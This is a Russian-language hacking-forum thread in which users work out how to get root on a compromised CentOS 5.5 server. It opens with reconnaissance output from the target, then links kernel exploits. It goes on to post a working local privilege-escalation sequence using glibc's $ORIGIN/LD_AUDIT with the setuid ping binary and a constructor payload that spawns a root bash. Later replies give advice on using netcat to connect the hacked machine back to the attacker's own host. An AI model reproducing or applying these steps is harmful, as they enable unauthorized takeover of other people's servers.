ANTICHAT — форум по информационной безопасности, OSINT и технологиям

P-29, Enlightenment.

http://grsecurity.net/~spender/exploits/enlightenment.tgz

Пишет sh-3.00$ ./run_null_exploits.sh

sh: ./run_null_exploits.sh: Permission denied

System Linux 2.6.18-194.11.1.el5.centos.plusPAE #1 SMP Wed Aug 11 09:10:13 EDT 2010 i686

Build Date Aug 14 2012 09:55:08

sh-3.2$ ls -la /boot

total 19042

drwxr-xr-x 4 root root 1024 Sep 11 13:15 .

drwxr-xr-x 22 root root 4096 Sep 12 00:37 ..

-rw-r--r-- 1 root root 178 Aug 11 2010 .vmlinuz-2.6.18-194.11.1.el5.centos.plusPAE.hmac

-rw-r--r-- 1 root root 165 Jul 2 2010 .vmlinuz-2.6.18-194.8.1.el5PAE.hmac

-rw-r--r-- 1 root root 928942 Jan 21 2009 System.map-2.6.18-128.el5PAE

-rw-r--r-- 1 root root 968481 Aug 11 2010 System.map-2.6.18-194.11.1.el5.centos.plusPAE

-rw-r--r-- 1 root root 968012 Jul 2 2010 System.map-2.6.18-194.8.1.el5PAE

-rw-r--r-- 1 root root 67890 Jan 21 2009 config-2.6.18-128.el5PAE

-rw-r--r-- 1 root root 72933 Aug 11 2010 config-2.6.18-194.11.1.el5.centos.plusPAE

-rw-r--r-- 1 root root 69550 Jul 2 2010 config-2.6.18-194.8.1.el5PAE

drwxr-xr-x 2 root root 1024 Sep 11 13:14 grub

-rw------- 1 root root 2589443 Sep 11 13:14 initrd-2.6.18-128.el5PAE.img

-rw------- 1 root root 2536431 Jul 8 2010 initrd-2.6.18-128.el5PAE.img.dup_orig

-rw------- 1 root root 2598576 Aug 13 2010 initrd-2.6.18-194.11.1.el5.centos.plusPAE.img

-rw------- 1 root root 2574549 Jul 9 2010 initrd-2.6.18-194.8.1.el5PAE.img

drwx------ 2 root root 12288 Jul 8 2010 lost+found

-rw-r--r-- 1 root root 80032 Mar 12 2009 message

-rw-r--r-- 1 root root 101146 Jan 21 2009 symvers-2.6.18-128.el5PAE.gz

-rw-r--r-- 1 root root 119459 Aug 11 2010 symvers-2.6.18-194.11.1.el5.centos.plusPAE.gz

-rw-r--r-- 1 root root 111373 Jul 2 2010 symvers-2.6.18-194.8.1.el5PAE.gz

-rw-r--r-- 1 root root 1824500 Jan 21 2009 vmlinuz-2.6.18-128.el5PAE

-rw-r--r-- 1 root root 1873780 Aug 11 2010 vmlinuz-2.6.18-194.11.1.el5.centos.plusPAE

-rw-r--r-- 1 root root 1873588 Jul 2 2010 vmlinuz-2.6.18-194.8.1.el5PAE

sh-3.2$ ls -la --full-time /lib/lib*

-rwxr-xr-x 1 root root 7664 2010-07-27 19:46:29.000000000 +0300 /lib/libBrokenLocale-2.5.so

lrwxrwxrwx 1 root root 22 2010-08-13 13:36:54.000000000 +0300 /lib/libBrokenLocale.so.1 -> libB

rokenLocale-2.5.so

-rwxr-xr-x 1 root root 16704 2010-07-27 19:46:29.000000000 +0300 /lib/libSegFault.so

lrwxrwxrwx 1 root root 15 2010-07-09 13:05:31.000000000 +0300 /lib/libacl.so.1 -> libacl.so.1.1

.0

-rwxr-xr-x 1 root root 25624 2010-01-27 00:57:13.000000000 +0200 /lib/libacl.so.1.1.0

-rwxr-xr-x 1 root root 14128 2010-07-27 19:46:30.000000000 +0300 /lib/libanl-2.5.so

lrwxrwxrwx 1 root root 13 2010-08-13 13:36:54.000000000 +0300 /lib/libanl.so.1 -> libanl-2.5.so

lrwxrwxrwx 1 root root 16 2010-07-08 20:50:59.000000000 +0300 /lib/libattr.so.1 -> libattr.so.1

.1.0

-rwxr-xr-x 1 root root 15780 2007-01-06 07:12:05.000000000 +0200 /lib/libattr.so.1.1.0

lrwxrwxrwx 1 root root 17 2010-07-09 13:05:29.000000000 +0300 /lib/libaudit.so.0 -> libaudit.so

.0.0.0

-rwxr-xr-x 1 root root 97220 2010-03-31 09:29:12.000000000 +0300 /lib/libaudit.so.0.0.0

lrwxrwxrwx 1 root root 19 2010-07-09 13:05:29.000000000 +0300 /lib/libauparse.so.0 -> libaupars

e.so.0.0.0

-rwxr-xr-x 1 root root 54832 2010-03-31 09:29:12.000000000 +0300 /lib/libauparse.so.0.0.0

lrwxrwxrwx 1 root root 15 2010-07-09 13:05:28.000000000 +0300 /lib/libblkid.so.1 -> libblkid.so

.1.0

-rwxr-xr-x 1 root root 38556 2009-09-03 22:55:35.000000000 +0300 /lib/libblkid.so.1.0

-rwxr-xr-x 1 root root 1689388 2010-07-27 19:46:30.000000000 +0300 /lib/libc-2.5.so

lrwxrwxrwx 1 root root 11 2010-08-13 13:36:54.000000000 +0300 /lib/libc.so.6 -> libc-2.5.so

lrwxrwxrwx 1 root root 14 2010-07-08 20:50:59.000000000 +0300 /lib/libcap.so.1 -> libcap.so.1.1

0

-rwxr-xr-x 1 root root 11560 2007-03-14 20:15:10.000000000 +0200 /lib/libcap.so.1.10

-rwxr-xr-x 1 root root 191708 2010-07-27 19:46:30.000000000 +0300 /lib/libcidn-2.5.so

lrwxrwxrwx 1 root root 14 2010-08-13 13:36:54.000000000 +0300 /lib/libcidn.so.1 -> libcidn-2.5.

so

lrwxrwxrwx 1 root root 17 2010-07-09 13:05:28.000000000 +0300 /lib/libcom_err.so.2 -> libcom_er

r.so.2.1

-rwxr-xr-x 1 root root 7748 2009-09-03 22:55:35.000000000 +0300 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 45432 2010-07-27 19:46:30.000000000 +0300 /lib/libcrypt-2.5.so

lrwxrwxrwx 1 root root 15 2010-08-13 13:36:54.000000000 +0300 /lib/libcrypt.so.1 -> libcrypt-2.

5.so

-rwxr-xr-x 1 root root 1295424 2010-03-26 23:46:10.000000000 +0200 /lib/libcrypto.so.0.9.8e

lrwxrwxrwx 1 root root 19 2010-08-13 13:36:59.000000000 +0300 /lib/libcrypto.so.6 -> libcrypto.

so.0.9.8e

-rwxr-xr-x 1 root root 1011760 2010-07-12 19:11:02.000000000 +0300 /lib/libdb-4.3.so

lrwxrwxrwx 1 root root 18 2010-07-09 13:06:15.000000000 +0300 /lib/libdbus-1.so.3 -> libdbus-1.

so.3.4.0

-rwxr-xr-x 1 root root 253392 2010-03-31 16:20:46.000000000 +0300 /lib/libdbus-1.so.3.4.0

lrwxrwxrwx 1 root root 31 2010-08-13 13:37:00.000000000 +0300 /lib/libdevmapper-event-lvm2.so -

> libdevmapper-event-lvm2.so.2.02

-r-xr-xr-x 1 root root 4900 2010-07-29 16:15:22.000000000 +0300 /lib/libdevmapper-event-lvm2.so.2

.02

lrwxrwxrwx 1 root root 37 2010-08-13 13:37:00.000000000 +0300 /lib/libdevmapper-event-lvm2mirro

r.so -> libdevmapper-event-lvm2mirror.so.2.02

-r-xr-xr-x 1 root root 6900 2010-07-29 16:15:22.000000000 +0300 /lib/libdevmapper-event-lvm2mirro

r.so.2.02

lrwxrwxrwx 1 root root 39 2010-08-13 13:37:00.000000000 +0300 /lib/libdevmapper-event-lvm2snaps

hot.so -> libdevmapper-event-lvm2snapshot.so.2.02

-r-xr-xr-x 1 root root 4528 2010-07-29 16:15:22.000000000 +0300 /lib/libdevmapper-event-lvm2snaps

hot.so.2.02

lrwxrwxrwx 1 root root 25 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper-event.a -> libd

evmapper-event.a.1.02

-r-xr-xr-x 1 root root 40828 2010-05-26 15:53:35.000000000 +0300 /lib/libdevmapper-event.a.1.02

lrwxrwxrwx 1 root root 26 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper-event.so -> lib

devmapper-event.so.1.02

-r-xr-xr-x 1 root root 18156 2010-05-26 15:53:36.000000000 +0300 /lib/libdevmapper-event.so.1.02

lrwxrwxrwx 1 root root 19 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper.a -> libdevmapp

er.a.1.02

-r-xr-xr-x 1 root root 414264 2010-05-26 15:53:36.000000000 +0300 /lib/libdevmapper.a.1.02

lrwxrwxrwx 1 root root 20 2010-07-09 13:05:28.000000000 +0300 /lib/libdevmapper.so -> libdevmap

per.so.1.02

-r-xr-xr-x 1 root root 132620 2010-05-26 15:53:36.000000000 +0300 /lib/libdevmapper.so.1.02

-rwxr-xr-x 1 root root 20668 2010-07-27 19:46:30.000000000 +0300 /lib/libdl-2.5.so

lrwxrwxrwx 1 root root 12 2010-08-13 13:36:54.000000000 +0300 /lib/libdl.so.2 -> libdl-2.5.so

lrwxrwxrwx 1 root root 34 2010-07-09 13:06:17.000000000 +0300 /lib/libdmraid-events-isw.so -> l

ibdmraid-events-isw.so.1.0.0.rc13

-rwxr-xr-x 1 root root 19388 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid-events-isw.so.1.0.

0.rc13

-r-xr-xr-x 1 root root 19388 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid-events-isw.so.1.0.

0.rc13-17

lrwxrwxrwx 1 root root 23 2010-07-09 13:06:17.000000000 +0300 /lib/libdmraid.so -> libdmraid.so

.1.0.0.rc13

-rwxr-xr-x 1 root root 219804 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid.so.1.0.0.rc13

-r-xr-xr-x 1 root root 221440 2010-03-31 14:39:12.000000000 +0300 /lib/libdmraid.so.1.0.0.rc13-17

lrwxrwxrwx 1 root root 13 2010-07-09 13:05:28.000000000 +0300 /lib/libe2p.so.2 -> libe2p.so.2.3

-rwxr-xr-x 1 root root 21608 2009-09-03 22:55:35.000000000 +0300 /lib/libe2p.so.2.3

lrwxrwxrwx 1 root root 17 2010-07-09 13:05:32.000000000 +0300 /lib/libexpat.so.0 -> libexpat.so

.0.5.0

-rwxr-xr-x 1 root root 133120 2009-12-08 16:23:13.000000000 +0200 /lib/libexpat.so.0.5.0

lrwxrwxrwx 1 root root 16 2010-07-09 13:05:28.000000000 +0300 /lib/libext2fs.so.2 -> libext2fs.

so.2.4

-rwxr-xr-x 1 root root 115216 2009-09-03 22:55:35.000000000 +0300 /lib/libext2fs.so.2.4

-rwxr-xr-x 1 root root 46636 2010-03-31 18:29:40.000000000 +0300 /lib/libgcc_s-4.1.2-20080825.so.1

lrwxrwxrwx 1 root root 28 2010-07-09 13:05:20.000000000 +0300 /lib/libgcc_s.so.1 -> libgcc_s-4.

1.2-20080825.so.1

lrwxrwxrwx 1 root root 23 2010-07-09 13:05:29.000000000 +0300 /lib/libglib-2.0.so.0 -> libglib-

2.0.so.0.1200.3

-rwxr-xr-x 1 root root 644472 2009-03-25 03:52:17.000000000 +0200 /lib/libglib-2.0.so.0.1200.3

lrwxrwxrwx 1 root root 26 2010-07-09 13:05:29.000000000 +0300 /lib/libgmodule-2.0.so.0 -> libgm

odule-2.0.so.0.1200.3

-rwxr-xr-x 1 root root 11396 2009-03-25 03:52:17.000000000 +0200 /lib/libgmodule-2.0.so.0.1200.3

lrwxrwxrwx 1 root root 26 2010-07-09 13:05:29.000000000 +0300 /lib/libgobject-2.0.so.0 -> libgo

bject-2.0.so.0.1200.3

-rwxr-xr-x 1 root root 259128 2009-03-25 03:52:17.000000000 +0200 /lib/libgobject-2.0.so.0.1200.3

lrwxrwxrwx 1 root root 26 2010-07-09 13:05:29.000000000 +0300 /lib/libgthread-2.0.so.0 -> libgt

hread-2.0.so.0.1200.3

-rwxr-xr-x 1 root root 14660 2009-03-25 03:52:17.000000000 +0200 /lib/libgthread-2.0.so.0.1200.3

-rwxr-xr-x 1 root root 29440 2007-03-15 05:26:22.000000000 +0200 /lib/libiw.so.28

-rwxr-xr-x 1 root root 7880 2007-01-06 09:57:38.000000000 +0200 /lib/libkeyutils-1.2.so

lrwxrwxrwx 1 root root 18 2010-07-08 20:51:00.000000000 +0300 /lib/libkeyutils.so.1 -> libkeyut

ils-1.2.so

-rwxr-xr-x 1 root root 216544 2010-07-27 19:46:30.000000000 +0300 /lib/libm-2.5.so

lrwxrwxrwx 1 root root 11 2010-08-13 13:36:54.000000000 +0300 /lib/libm.so.6 -> libm-2.5.so

-rwxr-xr-x 1 root root 109740 2010-07-27 19:46:30.000000000 +0300 /lib/libnsl-2.5.so

lrwxrwxrwx 1 root root 13 2010-08-13 13:36:54.000000000 +0300 /lib/libnsl.so.1 -> libnsl-2.5.so

-rwxr-xr-x 1 root root 36416 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_compat-2.5.so

lrwxrwxrwx 1 root root 20 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_compat.so.2 -> libnss

_compat-2.5.so

-rwxr-xr-x 1 root root 21948 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_dns-2.5.so

lrwxrwxrwx 1 root root 17 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_dns.so.2 -> libnss_dn

s-2.5.so

-rwxr-xr-x 1 root root 50848 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_files-2.5.so

lrwxrwxrwx 1 root root 19 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_files.so.2 -> libnss_

files-2.5.so

-rwxr-xr-x 1 root root 22764 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_hesiod-2.5.so

lrwxrwxrwx 1 root root 20 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_hesiod.so.2 -> libnss

_hesiod-2.5.so

-rwxr-xr-x 1 root root 46536 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_nis-2.5.so

lrwxrwxrwx 1 root root 17 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_nis.so.2 -> libnss_ni

s-2.5.so

-rwxr-xr-x 1 root root 55804 2010-07-27 19:46:30.000000000 +0300 /lib/libnss_nisplus-2.5.so

lrwxrwxrwx 1 root root 21 2010-08-13 13:36:54.000000000 +0300 /lib/libnss_nisplus.so.2 -> libns

s_nisplus-2.5.so

lrwxrwxrwx 1 root root 16 2010-07-09 13:06:04.000000000 +0300 /lib/libpam.so.0 -> libpam.so.0.8

1.5

-rwxr-xr-x 1 root root 44532 2010-03-11 19:24:38.000000000 +0200 /lib/libpam.so.0.81.5

lrwxrwxrwx 1 root root 21 2010-07-09 13:06:04.000000000 +0300 /lib/libpam_misc.so.0 -> libpam_m

isc.so.0.81.2

-rwxr-xr-x 1 root root 10168 2010-03-11 19:24:38.000000000 +0200 /lib/libpam_misc.so.0.81.2

lrwxrwxrwx 1 root root 17 2010-07-09 13:06:04.000000000 +0300 /lib/libpamc.so.0 -> libpamc.so.0

.81.0

-rwxr-xr-x 1 root root 9868 2010-03-11 19:24:38.000000000 +0200 /lib/libpamc.so.0.81.0

lrwxrwxrwx 1 root root 16 2010-07-08 20:51:06.000000000 +0300 /lib/libpcre.so.0 -> libpcre.so.0

.0.1

-rwxr-xr-x 1 root root 117448 2007-11-30 07:10:26.000000000 +0200 /lib/libpcre.so.0.0.1

-rwxr-xr-x 1 root root 54308 2010-03-31 07:53:48.000000000 +0300 /lib/libproc-3.2.7.so

-rwxr-xr-x 1 root root 137908 2010-07-27 19:46:30.000000000 +0300 /lib/libpthread-2.5.so

lrwxrwxrwx 1 root root 17 2010-08-13 13:36:54.000000000 +0300 /lib/libpthread.so.0 -> libpthrea

d-2.5.so

-rwxr-xr-x 1 root root 80636 2010-07-27 19:46:30.000000000 +0300 /lib/libresolv-2.5.so

lrwxrwxrwx 1 root root 16 2010-08-13 13:36:54.000000000 +0300 /lib/libresolv.so.2 -> libresolv-

2.5.so

-rwxr-xr-x 1 root root 48156 2010-07-27 19:46:30.000000000 +0300 /lib/librt-2.5.so

lrwxrwxrwx 1 root root 12 2010-08-13 13:36:54.000000000 +0300 /lib/librt.so.1 -> librt-2.5.so

-rwxr-xr-x 1 root root 93508 2009-09-04 02:05:42.000000000 +0300 /lib/libselinux.so.1

-rwxr-xr-x 1 root root 159412 2009-09-04 01:49:09.000000000 +0300 /lib/libsemanage.so.1

-rwxr-xr-x 1 root root 245376 2010-03-31 11:26:18.000000000 +0300 /lib/libsepol.so.1

lrwxrwxrwx 1 root root 12 2010-07-09 13:05:28.000000000 +0300 /lib/libss.so.2 -> libss.so.2.0

-rwxr-xr-x 1 root root 20492 2009-09-03 22:55:35.000000000 +0300 /lib/libss.so.2.0

-rwxr-xr-x 1 root root 291236 2010-03-26 23:46:10.000000000 +0200 /lib/libssl.so.0.9.8e

lrwxrwxrwx 1 root root 16 2010-08-13 13:36:59.000000000 +0300 /lib/libssl.so.6 -> libssl.so.0.9

.8e

-rwxr-xr-x 1 root root 6056 2007-03-14 19:17:47.000000000 +0200 /lib/libsysSp.so

lrwxrwxrwx 1 root root 19 2010-07-08 20:50:53.000000000 +0300 /lib/libtermcap.so.2 -> libtermca

p.so.2.0.8

-rwxr-xr-x 1 root root 13084 2007-01-06 15:01:17.000000000 +0200 /lib/libtermcap.so.2.0.8

-rwxr-xr-x 1 root root 33852 2010-07-27 19:46:30.000000000 +0300 /lib/libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2010-08-13 13:36:54.000000000 +0300 /lib/libthread_db.so.1 -> libthre

ad_db-1.0.so

-rwxr-xr-x 1 root root 15308 2010-07-27 19:46:30.000000000 +0300 /lib/libutil-2.5.so

lrwxrwxrwx 1 root root 14 2010-08-13 13:36:54.000000000 +0300 /lib/libutil.so.1 -> libutil-2.5.

so

lrwxrwxrwx 1 root root 14 2010-07-09 13:05:28.000000000 +0300 /lib/libuuid.so.1 -> libuuid.so.1

.2

-rwxr-xr-x 1 root root 15704 2009-09-03 22:55:35.000000000 +0300 /lib/libuuid.so.1.2

lrwxrwxrwx 1 root root 22 2010-08-13 13:37:04.000000000 +0300 /lib/libvolume_id.so.0 -> libvolu

me_id.so.0.66.0

-rwxr-xr-x 1 root root 32180 2010-08-05 02:29:24.000000000 +0300 /lib/libvolume_id.so.0.66.0

lrwxrwxrwx 1 root root 16 2010-07-09 13:05:32.000000000 +0300 /lib/libwrap.so.0 -> libwrap.so.0

.7.6

-rwxr-xr-x 1 root root 31344 2009-09-22 01:37:30.000000000 +0300 /lib/libwrap.so.0.7.6

sh-3.2$ mount

/dev/md2 on / type ext3 (rw,usrquota,grpquota)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

/dev/md3 on /home type ext3 (rw,usrquota,grpquota)

/dev/md0 on /boot type ext3 (rw)

tmpfs on /dev/shm type tmpfs (rw)

tmpfs on /opt/tmp type tmpfs (rw,noexec,nosuid,nodev,size=512M,mode=1777,nr_ino des=40k)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

sh-3.2$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/md2 48G 24G 22G 52% /

/dev/md3 402G 203G 179G 54% /home

/dev/md0 487M 30M 432M 7% /boot

tmpfs 4.0G 0 4.0G 0% /dev/shm

tmpfs 512M 0 512M 0% /opt/tmp

sh-3.2$ cat /etc/issue

CentOS release 5.5 (Final)

Kernel \r on an \m

sh-3.2$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# run-parts

01 * * * * root run-parts /etc/cron.hourly

02 4 * * * root run-parts /etc/cron.daily

22 4 * * 0 root run-parts /etc/cron.weekly

42 4 1 * * root run-parts /etc/cron.monthly

0 0 * * * root /usr/local/directadmin/plugins/SMTP_Limiter/scripts/reset_limits.sh #Added by SMTP Li

miter Plugin

sh-3.2$ cat /proc/version

Linux version 2.6.18-194.11.1.el5.centos.plusPAE (mockbuild@builder17.centos.org) (gcc version 4.1.2

20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Aug 11 09:10:13 EDT 2010

sh-3.2$ cat /proc/sys/vm/mmap_min_addr

cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

sh-3.2$ ls -la /usr/bin/staprun

ls: /usr/bin/staprun: No such file or directory



Ac1dB1tch3z, enlightenment - не подошли, может руки кривые!

mkdir /tmp/dn

ln /bin/ping /tmp/dn/target

exec 3 payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

^D

gcc -w -fPIC -shared -o /tmp/dn payload.c

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

Вот что помогло, всем спасибо!

Подскажите как порутать сервер?

http://www.exploit-db.com/exploits/8261/

О эксплоит есть осталось разобраться как его загрузить и выполнить.Кто поможет с меня пиво.

По почте пиво присылать будешь? На своей машине слушаешь порт через netcat: nc -l PORT.

На взломанной тачке коннектишься к своей, используешь сплоит --> профит!

Zed0x прога на комп для конекта так и называеться netcat?И как в ней потом выполнить сплоит?Нужно скопировать его к себе на комп а потом в netcat указать к нему путь?